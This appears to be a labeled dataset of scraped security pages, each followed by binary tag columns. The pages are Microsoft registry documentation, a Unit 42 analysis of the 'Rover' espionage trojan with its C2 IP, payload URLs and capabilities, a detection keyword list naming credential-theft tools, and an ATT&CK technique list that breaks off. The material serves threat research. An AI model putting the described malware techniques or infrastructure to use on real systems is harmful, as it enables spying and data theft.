PSReflect-RegHide.ps1 Cybersecurity Powershell 23 claps Brian Reitz WRITTEN BY Brian Reitz Follow Threat Detection at SpecterOps Posts By SpecterOps Team Members Posts By SpecterOps Team Members Follow Posts from SpecterOps team members on various topics relating information security Write the first response Discover Medium Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch Make Medium yours Follow all the topics you care about, and we\xe2\x80\x99ll deliver the best stories for you to your homepage and inbox. Explore Become a member Get unlimited access to the best stories on Medium \xe2\x80\x94 and support writers while you\xe2\x80\x99re at it. Just $5/month. Upgrade About Help Legal To make Medium work, we log user data. By using Medium, you agree to our Privacy Policy, including cookie policy.","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Enable the Remote Registry Service | Microsoft Docs Skip to main content Contents Exit focus mode Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents Enable the Remote Registry Service 11/17/2009 2 minutes to read In this article Applies To: Windows 7, Windows Server 2008 R2 A registry key value tells Shutdown Event Tracker when to prompt a user for information about an unexpected restart or shutdown. Without remote registry access, Shutdown Event Tracker cannot remotely reset this registry key value after you have provided a reason. Membership in the local Administrators group, or equivalent, on the remote computer is the minimum required to complete this procedure. To enable the Remote Registry service On the computer where you want to record Shutdown Event Tracker data, click Start, click in the Start Search box, type services.msc, and then press ENTER. Microsoft Management Console will start with the Services snap-in open. In the console pane, right-click Remote Registry and click Start. Additional considerations You must be a member of the local Administrators group, or equivalent, on the remote computer to complete this procedure. Additional references Work with Shutdown Event Tracker Shutdown Event Tracker Overview For more information about using Microsoft Management Console, see http://go.microsoft.com/fwlink/?linkid=70036. Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"New Malware 'Rover' Targets Indian Ambassador to Afghanistan Menu Tools Playbooks Speaking Events About Us New Malware \xe2\x80\x98Rover\xe2\x80\x99 Targets Indian Ambassador to Afghanistan 9,148 people reacted 0 7 min. read Share By Vicky Ray and Kaoru Hayashi February 29, 2016 at 5:00 PM Category: Malware, Threat Prevention, Unit 42 Tags: OpenAL, OpenCV, Rover, Trojan, VirusTotal On December 24, 2015, Unit 42 identified a targeted attack, delivered via email, on a high profile Indian diplomat, an Ambassador to Afghanistan. The body and content of the email suggest that it was crafted and spoofed to look like it was sent by the current Defence Minister of India, Mr. Manohar Parrikar, commending the Ambassador on his contributions and success. India has been a key nation in building and funding Afghanistan\xe2\x80\x99s infrastructure and economic development, which includes setting up iron ore mines, steel plants, power plants and transportation systems, helping reconstruct the Salma Dam and constructing a new Parliament Complex for the Afghan Government. Given India\xe2\x80\x99s significant contributions to the development of Afghanistan, it is likely that there may be groups or nations who would be interested in tracking and spying on key individuals who officially represent India in Afghanistan. Overview of Rover infection Figure 1 gives an overview of the exploitation, infection and C2 communications of the \xe2\x80\x98Rover\xe2\x80\x99 Trojan campaign targeting a victim running Windows XP. Figure 1: Overview\xc2 of the infection flow and C2 communications Rover Trojan Infection Steps: RTF file exploits CVE-2010-3333 and downloads an executable from newsumbrella[.]net. The executable file downloaded from\xc2 newsumbrella[.]net\xc2 is executed on the victim machine. The executable \xe2\x80\x98file.exe\xe2\x80\x98 is a downloader which is used to call out to a server with the IP \xe2\x80\x9846.166.165.254\xe2\x80\x98 and download the main Rover malware along with plugins used by the Rover malware. Rover malware and plugins are downloaded and installed on the victim machine. Data exfiltrated from the victim machine. Targeting and Infection Figure 2 shows an email which was sent to the Ambassador of India, appearing to commend the contributions the Ambassador has made in the development and success of projects on national interest, and attaching a letter of appreciation with a file name, \xe2\x80\x9cAppreciation_letter.doc\xe2\x80\x9d. The attachment is an RTF file which exploits a specific vulnerability in Microsoft Word, CVE-2010-3333. \xc2 Figure 2: Spear phishing email sent to the Ambassador of Afghanistan If the recipient of the e-mail opened the attachment in a vulnerable version of Word, the exploit code would download and execute a file from the domain newsumbrella[.]net as shown in Figure 3 below. Figure 3: Hexdump showing the domain and the executable downloaded Malware Analysis During the time of analysis the executable file systemupdateAPI.exe was no longer being hosted on the newsumbrealla[.]net domain. However, we have noticed the same domain hosting another executable in the past within the same parent directory and having a similar naming for the folders as shown below newsumbrella[.]net/ne3s/lat3st/w0rld/systemupdateAPI[.]exe newsumbrella[.]net/ne3s/file[.]exe \xe2\x80\x93 hosted earlier We believe that the executables hosted under the parent directory \xe2\x80\x98ne3s\xe2\x80\x99 are variants of the same downloader Trojan, which was used to download the Rover Trojan. The file, file.exe, contains the following debug information that indicates the file was originally named systemupdateAPI.exe. Figure 4: Debug information of downloader program By analyzing file.exe, we can see that it is a downloader, which creates \xe2\x80\x98c:\\system\xe2\x80\x99 directory and depending on the OS version used, downloads the main Rover payload along with multiple DLL modules from 46.166.165.254. Figure 5: Code snippet showing the OS version check and the subsequent download from 46.166.165.254 If the infected system is running an OS version prior to Windows Vista, it would download the following files from 46.166.165.254: WindowsSecurityService2.exe (\xe2\x80\x98Rover\xe2\x80\x99 main module) Openal32.dll Cxcore210.dll (OpenCV) Highgui210.dll (OpenCV) libsndfile-1.dll If the OS version is Windows Vista or later, it would download the following files from 46.166.165.254 : WindowsSecurityService3.exe (\xe2\x80\x98Rover\xe2\x80\x99 main module) OpenAL32.dll opencv_world300.dll msvcp100.dll msvcp110.dll msvcp120.dll msvcr100.dll msvcr110.dll msvcr120.dll After retrieving these files, the downloader Trojan executes the main module. Even though the main modules use different library versions, the functionality of the backdoors are identical. By analyzing the files downloaded to the victim machine, we can see that the executable WindowsSecurityService2.exe imports the four DLL files that were downloaded to the same directory. The four DDLs are cxcore210.dll, highgui210.dll, OpenAL32.dll and libsndfile-1.dll as shown in Figure 6 Figure 6: Executable and DLLs downloaded to the victim machine Attributes of the Rover variant ############################################## File: WindowsSecurityService2.exe ############################################## Meta-data =============================================== Size\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 : 337920 bytes Type\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 : PE32 executable (console) Intel 80386, for MS Windows Architecture\xc2 : 32 Bits binary MD5\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 : 76429f8515768f9f5def697e71071f51 SHA1\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 : d04ce934561934f758d77dfa944bd6743dd82cff SHA256: 7757517ae6b4d513a57826f9ab65bd070d99d25ac526cfae3e9955c3c7cd457assdeep\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 : 6144:JabBRNUKgZ9SN0jzoFBB9hcrpXwg9xXYOGl93XO2rQLfbTpLuO7bIWjRO5gjPNq:JarSKu6yzoF8rpAqXYv3XOgQLfnpLuOu imphash\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 : b5aa366f452feb9f4dff3c72157ca1f9 Date\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 : 0x5637227B [Mon Nov 2 08:44:43 2015 UTC] Language\xc2 \xc2 \xc2 \xc2 \xc2 : ENGLISH CRC:\xc2 \xc2 (Claimed) : 0x59736, (Actual): 0x59736 Entry Point\xc2 \xc2 : 0x43e3c8 .text 0/5 =============================================== Imports =============================================== [1] ADVAPI32.dll [2] WS2_32.dll [3] WLDAP32.dll [4] cxcore210.dll (OpenCV module) [5] highgui210.dll (OpenCV module) [6] OpenAL32.dll [7] libsndfile-1.dll [8] GDI32.dll [9] KERNEL32.dll [10] USER32.dll [11] MSVCP90.dll [12] RPCRT4.dll [13] MSVCR90.dll The author of \xe2\x80\x98Rover\xe2\x80\x99 used the following open source projects to implement the main functionalities of this custom malware. OpenCV \xe2\x80\x93 Taking photos from the web cam OpenAL \xe2\x80\x93 Recording Audio Libsndfile \xe2\x80\x93 C library used for reading and writing audio files LibCurl \xe2\x80\x93 For all network communications OpenCV and OpenAL Both versions of Rover use OpenCV and OpenAL for some of the main functions. OpenCV is a library of functions written primarily for building real time computer vision applications, image processing and also machine learning. It has seen wide acceptance in security systems, medical image analysis, unmanned vehicles, visual surveillance, object tracking, Artificial Intelligence and many other applications. OpenAL is a cross-platform audio API for rendering multichannel three-dimensional positional audio (i.e., It is a means to generate audio in a three-dimensional space.) Earlier versions of OpenAL were opensource but later versions (since v1.1) have been proprietary. Once executed, Rover creates following registry entry to execute itself when the computer reboots. HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\xe2\x80\x9dSystem Application\xe2\x80\x9d = c:\\system\\WindowsSecurityService[2 or 3].exe The malware then creates six threads, each with a different job: Heartbeat Screenshot Stealing Files from HDD Keylogger Search files on USB Backdoor Figure 7: Threads created by the malware 1. Heartbeat: This sends heartbeat signal on HTTP to the C2 server at 46.166.165.254 every five seconds and checks whether the C2 server is running. 2. ScreenShot: This saves screenshots as c:\\system\\screenshot.bmp and sends it to the C2 server at 46.166.165.254 every 60 minutes. Figure 8: Screenshots sent to C2 server at 46.166.165.254 3. Finding specific file types on Removable Drive: This thread searches for for files with the following extensions on removable drives and copies them to \xe2\x80\x98c:\\system\xe2\x80\x99 every 5 seconds. pdf doc docx ppt pptx xls xlsx 4. Keylogger: This logs key strokes at \xe2\x80\x98c:\\system\\log.txt\xe2\x80\x99 and sends captured data to the C2 every 10 seconds 5. Stealing specific file types from Hard Drive: This thread searches for for files with the following extensions on fixed drives and sends them to C2 every 60 minutes. pdf doc docx ppt pptx xls xlsx Figure 9: Document file being sent to C2 6. Backdoor: This thread obtains backdoor commands from C2 every 10 seconds and executes them. Backdoor commands are listed below: Command Description CAMERA Take photos using system webcam and store them as c:\\system\\camera.jpg before sending to the C2. AUDIO Record audio from default audio input as c:\\system\\audio.ogg and sending it to the C2. SCREEN Take a screenshot and save it as c:\\system\\screenshot.bmp then send it to the C2. KILL Remove persistence registry entry and terminate itself. Though \xe2\x80\x98Rover\xe2\x80\x99 is unsophisticated and lacks many modern features common to advanced malware, detection rate of the \xe2\x80\x98Rover\xe2\x80\x99 is extremely low. At the time of this writing, two out of three samples on VirusTotal were not detected by any Antivirus product Figure 10: No detection by any AV product on Virustotal Figure 11: Low detection rate Summary OpenCV has been extensively used by organizations, government bodies, and research groups for real time capture, image manipulation, object detection and many other uses in new forms of Human-Computer interaction, security systems, driver-less cars among many others. OpenCV was also used by the Mars Rovers to send captured data back to Earth. It is interesting to see the very code used in such significant projects also being used to track and spy on individuals being targeted and which can remain undetected by traditional security systems. Though \xe2\x80\x98Rover\xe2\x80\x99 is an unsophisticated malware lacking modern malware features, it seems to be successful in bypassing traditional security systems and fulfilling the objectives of the threat actor behind the campaign in exfiltrating information from the targeted victim. It is important to understand the techniques and tools being used by such threat actors to better defend and protect organizations from such threats. Palo Alto Networks AutoFocus users can identify this threat using the Rover tag. IOCs: C2: 46.166.165.254 Downloader hosting links: newsumbrella[.]net/ne3s/lat3st/w0rld/systemupdateAPI[.]exe newsumbrella[.]net/ne3s/file[.]exe newsumbrella[.]net/bla3k/extra7/systemupdateAPI[.]exe\xc2 Filename File Type SHA 256 Appreciation_letter.doc RTF 6c9862a65741b56b849928300 aff310d60b815ee5f5f9f133469 e3b035e7e936 Questionnaire.doc RTF 5f656cf07a1d5e7c439aad4023 5dc78e47bac719c62e03728cc 40267383880bd Terrorism.doc;India & RTF 6096ff941af95638944f2fcdf4a5 046aa028b803b010b1a2d000 028b1a4967bc Appreciation_ letter.doc RTF 7bf3a425be41ad9cc713e4821 6e061c788f36e2727de5d0b6b 6ac4f435fe1c06 RTF 06b12649dba7f61cb581f97797 bdfba3a7f057a36b448d4c91a3 a7d89fff8d54 WindowsSecurity Service3.exe PE 61a2935fcb0a385f9e67855ef6f 95bda5f09fdb7c1435f215ce18 b7b61993daa file.exe PE a5e5571cda838e97a6beb1a65 acdfbaaf80027f60417aadb0d3 4292f19c0f3b3 WindowsSecurity Service2.exe PE 7757517ae6b4d513a57826f9ab 65bd070d99d25ac526cfae3e99 55c3c7cd457a WindowsSecurity Service3.exe PE 3dc709a3bcaa82220d6a76ea47 374bd864c37817c7041c7e9f4e e8ba42847f34 References https://en.wikipedia.org/wiki/Afghanistan%E2%80%93India_relations http://docs.opencv.org/3.1.0/#gsc.tab=0 http://docs.opencv.org/2.4/modules/highgui/doc/highgui.html https://en.wikipedia.org/wiki/OpenAL http://www.cs.uml.edu/~holly/teaching/91450/spring2013/bschroeder_vision_robotics1.pdf https://ti.arc.nasa.gov/m/pub-archive/422h/0422%20(Pedersen).pdf Get updates from Palo Alto Networks! Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. Popular Resources Resource Center Blog Communities Tech Docs Unit 42 Sitemap Legal Notices Privacy Terms of Use Documents Account Manage Subscriptions \xc2 Report a Vulnerability \xc2\xa9 2019 Palo Alto Networks, Inc. All rights reserved.","1","0","0","1","0","0","1","1","1","1","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","1","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"4657(S) A registry value was modified. (Windows 10) | Microsoft Docs Skip to main content Contents Exit focus mode Feedback Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents 4657(S): A registry value was modified. 04/19/2017 4 minutes to read In this article Applies to Windows 10 Windows Server 2016 Subcategory:\xc2 Audit Registry Event Description: This event generates when a registry key value was modified. It doesn\xe2\x80\x99t generate when a registry key was modified. This event generates only if \xe2\x80\x9cSet Value"" auditing is set in registry key\xe2\x80\x99s SACL. Note\xc2 \xc2 For recommendations, see Security Monitoring Recommendations for this event. Event XML: - - 4657 0 0 12801 0 0x8020000000000000 744725 Security DC01.contoso.local - S-1-5-21-3457937927-2839227994-823803824-1104 dadmin CONTOSO 0x364eb \\\\REGISTRY\\\\MACHINE Name\\_New 0x54 %%1905 %%1873 %%1873 Andrei 0xce4 C:\\\\Windows\\\\regedit.exe Required Server Roles: None. Minimum OS Version: Windows Server 2008, Windows Vista. Event Versions: 0. Field Descriptions: Subject: Security ID [Type = SID]: SID of account that requested the \xe2\x80\x9cmodify registry value\xe2\x80\x9d operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event. Note\xc2 \xc2 A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers. Account Name [Type = UnicodeString]: the name of the account that requested the \xe2\x80\x9cmodify registry value\xe2\x80\x9d operation. Account Domain [Type = UnicodeString]: subject\xe2\x80\x99s domain or computer name. Formats vary, and include the following: Domain NETBIOS name example: CONTOSO Lowercase full domain name: contoso.local Uppercase full domain name: CONTOSO.LOCAL For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is \xe2\x80\x9cNT AUTHORITY\xe2\x80\x9d. For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: \xe2\x80\x9cWin81\xe2\x80\x9d. Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, \xe2\x80\x9c4624: An account was successfully logged on.\xe2\x80\x9d Object: Object Name [Type = UnicodeString]: full path and name of the registry key which value was modified. The format is: \\REGISTRY\\HIVE\\PATH where: HIVE: HKEY_LOCAL_MACHINE = \\REGISTRY\\MACHINE HKEY_CURRENT_USER = \\REGISTRY\\USER\\[USER_SID], where [USER_SID] is the SID of current user. HKEY_CLASSES_ROOT = \\REGISTRY\\MACHINE\\SOFTWARE\\Classes HKEY_USERS = \\REGISTRY\\USER HKEY_CURRENT_CONFIG = \\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Hardware Profiles\\Current PATH \xe2\x80\x93 path to the registry key. Object Value Name [Type = UnicodeString]: the name of modified registry key value. Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, \xe2\x80\x9c4656: A handle to an object was requested.\xe2\x80\x9d This parameter might not be captured in the event, and in that case appears as \xe2\x80\x9c0x0\xe2\x80\x9d. Operation Type [Type = UnicodeString]: the type of performed operation with registry key value. Most common operations are: New registry value created Registry value deleted Existing registry value modified Process Information: Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the registry key value was modified. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column): If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager. You can also correlate this process ID with a process ID in other events, for example, \xe2\x80\x9c4688: A new process has been created\xe2\x80\x9d Process Information\\New Process ID. Process Name [Type = UnicodeString]: full path and the name of the executable for the process. Change Information: Old Value Type [Type = UnicodeString]: old type of changed registry key value. Registry key value types: Value Type Description REG_SZ String REG_BINARY Binary REG_DWORD DWORD (32-bit) Value REG_QWORD QWORD (64-bit) Value REG_MULTI_SZ Multi-String Value REG_EXPAND_SZ Expandable String Value Old Value [Type = UnicodeString]: old value for changed registry key value. New Value Type [Type = UnicodeString]: new type of changed registry key value. See table above for possible values. New Value [Type = UnicodeString]: new value for changed registry key value. Security Monitoring Recommendations For 4657(S): A registry value was modified. Important\xc2 \xc2 For this event, also see Appendix A: Security monitoring recommendations for many audit events. If you have a pre-defined \xe2\x80\x9cProcess Name\xe2\x80\x9d for the process reported in this event, monitor all events with \xe2\x80\x9cProcess Name\xe2\x80\x9d not equal to your defined value. You can monitor to see if \xe2\x80\x9cProcess Name\xe2\x80\x9d is not in a standard folder (for example, not in System32 or Program Files) or is in a restricted folder (for example, Temporary Internet Files). If you have a pre-defined list of restricted substrings or words in process names (for example, \xe2\x80\x9cmimikatz\xe2\x80\x9d or \xe2\x80\x9ccain.exe\xe2\x80\x9d), check for these substrings in \xe2\x80\x9cProcess Name.\xe2\x80\x9d If Object Name is a sensitive or critical registry key for which you need to monitor any modification of its values, monitor all 4657 events. If Object Name has specific values (Object Value Name) and you need to monitor modifications of these values, monitor for all 4657 events. Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. Feedback Send feedback about This product This page You may also leave feedback directly on GitHub . This page You may also leave feedback directly on GitHub . Liquid error: Can't find the localized string giveDocumentationFeedback for template Conceptual. Issue Title Leave a comment Submit feedback Loading feedback... There are no open issues There are no closed issues View on GitHub Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"RegDelNull - Windows Sysinternals | Microsoft Docs Skip to main content Contents Exit focus mode Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents RegDelNull v1.11 07/04/2016 2 minutes to read In this article By Mark Russinovich Published: July 4, 2016 Download RegDelNull (152 KB) Introduction This command-line utility searches for and allows you to delete Registry keys that contain embedded-null characters and that are otherwise undeleteable using standard Registry-editing tools. Note: deleting Registry keys may cause the applications they are associated with to fail. Using RegDelNull Usage: regdelnull [-s] Parameter Description -s Recurse into subkeys. Here's an example of RegDelNull when used on a system on which the RegHide sample program has created a null-embedded key: C:\\>regdelnull hklm -sRegDelNull v1.10 - Delete Registry keys with embedded Nulls Copyright (C) 2005-2006 Mark Russinovich Sysinternals - www.sysinternals.com Null-embedded key (Nulls are replaced by '*'): HKLM\\SOFTWARE\\Systems Internals\\Can't touch me!* Delete (y/n) y Scan complete. Download RegDelNull (152 KB) Runs on: Client: Windows Vista (32-bit) and higher Server: Windows Server 2008 (32-bit) and higher Nano Server: 2016 and higher Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Defacement - Enterprise | MITRE ATT&CK\xe2\x84\xa2 Matrices Tactics PRE-ATT&CK Enterprise Mobile Techniques PRE-ATT&CK Enterprise Mobile Mitigations Enterprise Mobile Groups Software Resources General Information Getting Started ATT&CKcon Working with ATT&CK FAQ Updates Previous Versions Related Projects Blog\xc2 Contribute Register to stream ATT&CKcon 2.0 October 29-30 ENTERPRISE ENTERPRISE MOBILE PRE-ATT&CK TECHNIQUES All Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Replication Through Removable Media Spearphishing Attachment Spearphishing Link Spearphishing via Service Supply Chain Compromise Trusted Relationship Valid Accounts Execution AppleScript CMSTP Command-Line Interface Compiled HTML File Control Panel Items Dynamic Data Exchange Execution through API Execution through Module Load Exploitation for Client Execution Graphical User Interface InstallUtil Launchctl Local Job Scheduling LSASS Driver Mshta PowerShell Regsvcs/Regasm Regsvr32 Rundll32 Scheduled Task Scripting Service Execution Signed Binary Proxy Execution Signed Script Proxy Execution Source Space after Filename Third-party Software Trap Trusted Developer Utilities User Execution Windows Management Instrumentation Windows Remote Management XSL Script Processing Persistence .bash_profile and .bashrc Accessibility Features Account Manipulation AppCert DLLs AppInit DLLs Application Shimming Authentication Package BITS Jobs Bootkit Browser Extensions Change Default File Association Component Firmware Component Object Model Hijacking Create Account DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Hypervisor Image File Execution Options Injection Kernel Modules and Extensions Launch Agent Launch Daemon Launchctl LC_LOAD_DYLIB Addition Local Job Scheduling Login Item Logon Scripts LSASS Driver Modify Existing Service Netsh Helper DLL New Service Office Application Startup Path Interception Plist Modification Port Knocking Port Monitors Rc.common Re-opened Applications Redundant Access Registry Run Keys / Startup Folder Scheduled Task Screensaver Security Support Provider Service Registry Permissions Weakness Setuid and Setgid Shortcut Modification SIP and Trust Provider Hijacking Startup Items System Firmware Systemd Service Time Providers Trap Valid Accounts Web Shell Windows Management Instrumentation Event Subscription Winlogon Helper DLL Privilege Escalation Access Token Manipulation Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Bypass User Account Control DLL Search Order Hijacking Dylib Hijacking Exploitation for Privilege Escalation Extra Window Memory Injection File System Permissions Weakness Hooking Image File Execution Options Injection Launch Daemon New Service Path Interception Plist Modification Port Monitors Process Injection Scheduled Task Service Registry Permissions Weakness Setuid and Setgid SID-History Injection Startup Items Sudo Sudo Caching Valid Accounts Web Shell Defense Evasion Access Token Manipulation Binary Padding BITS Jobs Bypass User Account Control Clear Command History CMSTP Code Signing Compile After Delivery Compiled HTML File Component Firmware Component Object Model Hijacking Control Panel Items DCShadow Deobfuscate/Decode Files or Information Disabling Security Tools DLL Search Order Hijacking DLL Side-Loading Execution Guardrails Exploitation for Defense Evasion Extra Window Memory Injection File Deletion File Permissions Modification File System Logical Offsets Gatekeeper Bypass Group Policy Modification Hidden Files and Directories Hidden Users Hidden Window HISTCONTROL Image File Execution Options Injection Indicator Blocking Indicator Removal from Tools Indicator Removal on Host Indirect Command Execution Install Root Certificate InstallUtil Launchctl LC_MAIN Hijacking Masquerading Modify Registry Mshta Network Share Connection Removal NTFS File Attributes Obfuscated Files or Information Plist Modification Port Knocking Process Doppelg\xc3\xa4nging Process Hollowing Process Injection Redundant Access Regsvcs/Regasm Regsvr32 Rootkit Rundll32 Scripting Signed Binary Proxy Execution Signed Script Proxy Execution SIP and Trust Provider Hijacking Software Packing Space after Filename Template Injection Timestomp Trusted Developer Utilities Valid Accounts Virtualization/Sandbox Evasion Web Service XSL Script Processing Credential Access Account Manipulation Bash History Brute Force Credential Dumping Credentials in Files Credentials in Registry Exploitation for Credential Access Forced Authentication Hooking Input Capture Input Prompt Kerberoasting Keychain LLMNR/NBT-NS Poisoning and Relay Network Sniffing Password Filter DLL Private Keys Securityd Memory Two-Factor Authentication Interception Discovery Account Discovery Application Window Discovery Browser Bookmark Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Process Discovery Query Registry Remote System Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion Lateral Movement AppleScript Application Deployment Software Distributed Component Object Model Exploitation of Remote Services Logon Scripts Pass the Hash Pass the Ticket Remote Desktop Protocol Remote File Copy Remote Services Replication Through Removable Media Shared Webroot SSH Hijacking Taint Shared Content Third-party Software Windows Admin Shares Windows Remote Management Collection Audio Capture Automated Collection Clipboard Data Data from Information Repositories Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Email Collection Input Capture Man in the Browser Screen Capture Video Capture Command and Control Commonly Used Port Communication Through Removable Media Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Encoding Data Obfuscation Domain Fronting Domain Generation Algorithms Fallback Channels Multi-hop Proxy Multi-Stage Channels Multiband Communication Multilayer Encryption Port Knocking Remote Access Tools Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Standard Non-Application Layer Protocol Uncommonly Used Port Web Service Exfiltration Automated 